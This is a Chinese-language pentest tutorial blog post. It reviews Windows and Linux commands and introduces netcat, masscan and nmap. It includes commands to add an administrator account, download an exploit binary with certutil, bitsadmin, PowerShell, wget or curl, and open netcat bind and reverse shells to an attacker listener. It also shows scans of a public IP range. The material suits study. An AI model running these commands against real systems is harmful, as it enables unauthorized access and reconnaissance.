#作者:允砸兒
#日期:乙巳青蛇年? 四月廿一(2025年5月18日)
今天筆者帶大家繼續學習,網安的知識比較雜且知識面很廣,這一部分會介紹很多需要使用的工具。會用各種工具是做網安的基礎,ok咱們繼續一起深入了解。
筆者先回顧一下關于Windows命令和Linux命令:
Windows命令回顧
基礎命令:chdir(cd)、dir、whoami、ipconfig
#查看用戶
net user
#創建用戶
net user troyber/add
#設置密碼
net user troyber 123456
#設置成管理員
net localgroup administrators troyber/add
#激活
net user troyber/active
#刪除
net user troyber/delete
權限:
1、直接點擊鼠標右鍵屬性里面的安全編輯完全控制
2、Windows提權
文件下載:
把命令放到黑窗口里面
這是命令:(注意保存在那里? Windows+system32)
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:80/ppp.php -OutFile abc.php "
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
bitsadmin /rawreturn /transfer down"http://127.0.0.1:8080/ms10-051.exe" c:\\exploit.exe
Linux命令回顧
基礎命令:pwd、id、ls
權限:Linux提權
ll-a
*? r (讀權限):表示有讀取文件或目錄內容的權限
*? w(寫權限):表示有寫入文件或目錄內容的權限
*? x(執行權限):表示有執行文件或目錄的權限
*? -(無權限):表示沒有相應的權限
chmod u
? ? ? ? ??g ?+(加入) ?r
? ? ? ? ??o? -(除去)w
? ? ? ? ? a ?=(設定) ?x ? ?文件或目錄
文件下載:
wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
接下來筆者介紹一些工具#主要是幫助我們收集各種情報的
nc? (網貓)瑞士軍刀
概念
NetCat簡稱‘nc’,有著網絡安全界‘瑞士軍刀的美稱’,可以通過TCP/UDP協議讀寫,是一個好用穩定的連接系統后門的工具,同時也是一個網絡調試和開發工具。
參數
-l :開啟監聽
-p :指定端口
-t :以talent形式應答
-e :程序重定向
-n :以數字的形式顯示IP
-v :顯示執行命令過程
-z :不進行交互,直接顯示結果
-u :使用udp協議傳輸
-w :設置超時時間
-d :后臺運行
基礎使用
筆者帶大家做一個案例:簡單聊天
1、在安裝好nc的文件夾里的路徑中輸入cmd#注意要在nc.exe的文件夾里面輸入
2、打開兩次黑窗口一個作為服務端一個作為客戶端
3、在服務端輸入:D:\install\netcat\netcat-win32-1.12>nc.exe -lp 5566
? ? 在客戶端輸入:D:\install\netcat\netcat-win32-1.12>nc.exe 127.0.0.1 5566
我可以在服務端輸入hello客戶端也可以接收到hello
正向返回shell
前面的進黑窗口的步驟筆者省略了直接進行操作
1、在服務端:nc.exe -lp 5566 -e cmd.exe?
? 在客戶端:nc.exe 127.0.0.1 5566
#服務端我把cmd的權限給你了,在客戶端我得到了權限后,我第一次退出的是服務端,第二次退出的才是客戶端(本體)
反彈shell
在這里面筆者開一個2012的虛擬機進行操作,筆者會分為主機和虛擬機(Windows系統)進行操作#注意虛擬機里面也要有nc
我們通過正向shell的時候會被防火墻進行攔截(#注意做測試的時候需要關閉防火墻),所以我們使目標機主動向外發起連接這樣就會繞過防火墻建立通道。
主機啟動監聽窗口:nc.exe -lvp 5566
2012目標(通過漏洞利用、釣魚攻擊、惡意腳本等方式,讓目標機器執行一條反向連接命令)
nc.exe -e cmd 192.168.111.1 5566
目標機器主動連接到攻擊者的監聽端口,攻擊者獲得目標機器的Shell控制權。
Linux系統
主機啟動監聽窗口:nc -lvp 5566
目標機:nc -e /bin/bash 192.168.0.56 5566
文件傳輸
1、客戶端傳服務端
#服務端:nc -lp 5566 >outfile.txt
#客戶端:nc.exe 127.0.0.1 5566<a.txt
2、服務端傳客戶端
#客戶端:nc.exe 127.0.0.1 5566 >a.txt
#服務端:nc -lp 5566 <outfile.txt
*?>大于就相當于+ ?(輸入),<小于就相當于-(輸出),語句相反(端口隨便搞)
信息探測(情報)
1、端口掃描(kali執行)
nc -n -v -w1 -z 192.168.1.187 1-1000(w1一定要慢超時時間)
2、打印banner
echo " " |nc -n -v -w1 192.168.1.187 1-1000(html的一個界面,什么報錯信息都在banner里顯示)
masscan
概述
kali里面內置的工具,性能比nmap要高,可以先使用masscan對目標IP(通常是一個網段)進行全端口掃描,然后再使用nmap對存活主機的開放端口進行掃描,找出對應端口的服務存在的漏洞,使用
masscan對目標IP進行掃描的原因就是因為其速度快于nmap。
參數
基本掃描參數
-p :指定掃描的端口范圍
-P :設置目標主機的端口范圍
-iL :從文件中讀取目標IP地址
掃描速度和性能
--rate :設置掃描速度(數據包/秒)
--max-rate :設置最大掃描速度
--min-rate :設置最小掃描速度
--randomize-hosts :隨機掃描目標主機
輸出格式
-oL :以普通文本格式輸出結果
-oJ :以JSON格式輸出結果
-oG :以Drepable格式輸出結果
網絡探測
--ping :ping掃描,檢測存活主機
--banners :獲取主機服務的橫幅信息
基礎設置
--adapter :選擇網絡適配器
--router-mac:獲取主機服務的橫幅信息
實例
#掃描指定端口范圍和IP范圍
sudo masscan -p 80-90 --range 8.220.40.5
-8.220.40.255
#檢查指定范圍的主機是否存活
sudo masscan --ping --range 8.220.40.5
-8.220.40.255
#掃描所有端口,設置速率為任何值
masscan -p 1-65535 8.220.40.5
--rate 100
#從文件中讀取IP列表,輸出為JSON格式
masscan -iL targets.txt -oJ output.json
nmap
概述
功能強勁的掃描工具,kali里面自帶,支持端口掃描、主機探測、服務識別、系統識別
參數
端口掃描
-p 80 :掃80端口
-p 1-80 :掃1-80端口
-p 80,3389,22,21 :掃指定端口
主機探測
nmap -sP 8.220.40.5
?
服務識別
nmap -sV?8.220.40.5
? -p 80 nmap -sV?8.220.40.5
系統識別
?
sudo nmap?-O?8.220.40.5 -p 8080
結果導出
sudo nmap?-O?8.220.40.5 -oN re.txt
總結:筆者這是簡單寫一下這些工具,要深入可以在網上搜素一下語句。需要多加練習熟悉了就記住怎么操作了。后面我會寫一下搜集情報的思路,情報學很重要。
人生每一個階段都能悟出不同的道理,人的自信重要,主動出擊也重要。有句俗語說的好,臨淵羨魚,不如退而結網。